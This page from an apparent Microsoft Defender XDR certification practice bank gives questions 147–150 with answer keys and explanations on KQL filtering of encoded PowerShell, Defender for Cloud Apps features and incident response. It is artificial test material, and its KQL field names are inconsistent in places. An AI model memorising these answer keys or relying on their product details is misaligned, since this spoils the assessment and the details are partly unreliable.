Option B is wrong because DeviceEvents and DeviceFileCertificateInfo are used for tracking system-level events (e.g., driver loading, registry changes) and file certificate information, not for correlating process execution with network connections. Option C is wrong because IdentityLogonEvents and CloudAppEvents track user authentication and cloud application activity, not device-level process or network events. Option D is wrong because EmailEvents and EmailAttachmentInfo are focused on email delivery and attachment metadata, which are irrelevant to detecting PowerShell process behavior and outbound network connections on endpoints.

147
MCQhard

Refer to the exhibit. You are analyzing a KQL query in Microsoft Defender XDR Advanced Hunting. The query returns a list of devices where PowerShell or cmd.exe with encoded commands executed more than 5 times in the last 7 days. The security team suspects that one of the devices is compromised due to excessive use of encoded commands. However, a legitimate administrative script uses encoded commands regularly. How can you refine the query to reduce false positives while still detecting potentially malicious activity?

A.Increase the Count threshold to 10.
B.Add a filter to exclude processes signed by a trusted certificate or running under specific service accounts.
C.Remove cmd.exe from the FileName filter.
D.Change the time range to 1 day instead of 7 days.
AnswerB

Add a filter such as `where Process.Signer != 'Microsoft Corporation'` or `where AccountName !in ('svc_backup', 'svc_monitoring')` to exclude processes from known trusted sources. Many legitimate automation scripts are signed by an internal certificate authority or run under dedicated service accounts, so these allowlist-style filters reduce noise without hiding unknown or unsigned binaries. This is the correct approach because it preserves detection of suspicious, unsigned processes that lack a trustworthy signer and are not expected to run under service accounts. It targets the actual root cause: the alert currently flags benign, trusted execution as suspicious.

Why this answer

Adding a filter to exclude processes signed by a trusted certificate or running under specific service accounts directly addresses the legitimate administrative script that uses encoded commands. This refinement reduces false positives by allowing trusted, signed executables or known service accounts to bypass detection, while still flagging unsigned or anomalous encoded command executions that are more likely malicious. In Microsoft Defender XDR Advanced Hunting, you can use the `SigningCertificate` or `InitiatingProcessAccountName` fields in the KQL query to implement this exclusion.

Exam trap

The trap here is that candidates often choose to increase the count threshold (Option A) thinking it will reduce false positives, but this is a blunt instrument that also reduces true positives, whereas the correct approach is to use contextual filters like certificate or account exclusions to surgically remove known-good activity.

How to eliminate wrong answers

Option A is wrong because simply increasing the count threshold to 10 does not differentiate between legitimate and malicious use; it only reduces sensitivity, potentially missing real threats while still including false positives from the trusted script. Option C is wrong because removing cmd.exe from the FileName filter ignores that cmd.exe can also be used with encoded commands in attacks (e.g., Base64-encoded payloads), and the legitimate script may use PowerShell, not cmd.exe, so this would not address the false positive from PowerShell. Option D is wrong because changing the time range to 1 day instead of 7 days reduces the observation window, which may cause you to miss malicious activity that occurs over a longer period and does not solve the core issue of distinguishing legitimate from malicious encoded command usage.

148
MCQeasy

Your organization uses Microsoft Defender for Cloud Apps. You need to generate a report of all external users who have shared sensitive files from SharePoint Online. Which feature should you use?

A.OAuth app policies
B.Activity log
C.App permissions report
D.Cloud Discovery
AnswerB

The Defender for Cloud Apps activity log provides a comprehensive audit trail of user operations across connected cloud apps, including file-specific actions such as 'share file externally' and 'download file.' It supports granular filtering by user, IP address, device, and activity type, and you can specifically filter for activities where the target of the sharing is an external user. This makes it the definitive data source for investigating user file sharing, as it records both the actor and the action in near real-time. Alerts from these activities can also be routed to Microsoft Sentinel.

Why this answer

The Activity log in Microsoft Defender for Cloud Apps captures detailed records of user activities across connected apps, including file-sharing events in SharePoint Online. By filtering the log for external users and sensitive file types, you can generate a precise report of external sharing activities. This is the correct feature because it directly records the specific actions needed for the report.

Exam trap

The trap here is that candidates often confuse the Activity log (which records user actions) with the App permissions report (which lists app-level permissions), leading them to select Option C when they need to track individual user sharing events.

How to eliminate wrong answers

Option A is wrong because OAuth app policies govern third-party app permissions and consent, not user file-sharing activities. Option C is wrong because the App permissions report lists permissions granted to apps, not individual user actions like sharing files. Option D is wrong because Cloud Discovery analyzes shadow IT usage and traffic patterns, not specific file-sharing events in SharePoint Online.

149
Multi-Selecthard

You are investigating an incident in Microsoft Defender XDR. The incident involves multiple alerts from different sources. Which THREE actions should you take during the investigation?

Select 3 answers
A.Review the incident timeline to understand the sequence of events.
B.Delete all emails related to the incident from all mailboxes.
C.Use advanced hunting to query for related activities across devices and identities.
D.Isolate affected devices from the network using Microsoft Defender for Endpoint.
E.Reset the passwords of all user accounts involved.
AnswersA, C, D

Reviewing the incident timeline is the critical first step in an XDR investigation because it presents a chronological, correlated view of all alerts, user activities, and device events associated with the incident. This lets you reconstruct the attack chain from initial access to lateral movement and data exfiltration, identify which entities are truly affected, and establish what evidence must be preserved. Without this context, any containment or remediation action may be premature or miss the root cause.

Why this answer

Option A is correct because reviewing the incident timeline in Microsoft Defender XDR lets you correlate the multiple alerts from different sources into a chronological sequence, revealing the initial access, lateral movement, and impact so you can scope the incident accurately. Option C is correct because advanced hunting uses Kusto Query Language (KQL) against the unified schema (DeviceEvents, IdentityLogonEvents, EmailEvents, etc.) to pivot beyond the original alerts and uncover related activity across devices and identities that the incident view may not surface. Option D is correct because isolating affected devices via Microsoft Defender for Endpoint (through the device page or the 'Isolate device' action) contains the threat, prevents further lateral movement or command-and-control communication, and preserves forensic evidence while investigation continues.

Option B is not appropriate as a standard investigation step because bulk-deleting emails destroys evidence and is a remediation action (soft delete/hard delete via Purview) that should only follow confirmed scope, not precede it. Option E is also not a default investigation action because mass password resets can disrupt business operations and lock out users; credential remediation should be targeted based on confirmed compromise rather than applied to all involved accounts.

Exam trap

MS-102 often tests the distinction between investigation actions (timeline, hunting, isolation) and remediation actions (deleting emails, resetting passwords), so candidates must recognize that remediation should follow investigation, not replace it.

150
MCQmedium

A security administrator wants to monitor and control user downloads from a third-party SaaS application (e.g., Box) in real time. The administrator needs to apply session-level policies to block downloads based on risk. Which Microsoft 365 Defender feature should be used?

A.Cloud Discovery
B.Conditional Access App Control
C.App Connectors
D.Anomaly Detection Policies
AnswerB

Conditional Access App Control is the session-control engine in Microsoft Defender for Cloud Apps, integrated directly with Azure AD Conditional Access. When a user signs in, Azure AD routes the session through the Defender for Cloud Apps reverse proxy, allowing identity-aware policies to inspect the user's actions in real time and enforce constraints such as block download, monitor only, or require protection. This makes it the correct choice for monitoring and controlling user downloads from a third-party SaaS application at the individual session level.

Why this answer

Conditional Access App Control (CAAC) is the correct feature because it enables real-time session-level monitoring and control of user activities within third-party SaaS applications like Box. By integrating with Microsoft Defender for Cloud Apps, CAAC can apply policies to block downloads based on risk signals such as user location, device compliance, or anomalous behavior, all within the user's active session.

Exam trap

The trap here is that candidates often confuse App Connectors (API-based control) with Conditional Access App Control (proxy-based session control), mistakenly thinking API integration can enforce real-time download blocks when it only provides retrospective or policy-based actions on stored data.

How to eliminate wrong answers

Option A is wrong because Cloud Discovery is a tool for identifying shadow IT and assessing cloud app usage from traffic logs, not for applying real-time session-level download controls. Option C is wrong because App Connectors provide API-based visibility and control for data at rest (e.g., file scanning) but cannot enforce session-level policies in real time. Option D is wrong because Anomaly Detection Policies identify suspicious activities after they occur (e.g., impossible travel) and trigger alerts, not block downloads in real time within a session.

← PreviousPage 2 of 3 · 197 questions totalNext →

Ready to test yourself?

Try a timed practice session using only Defender Xdr Security questions.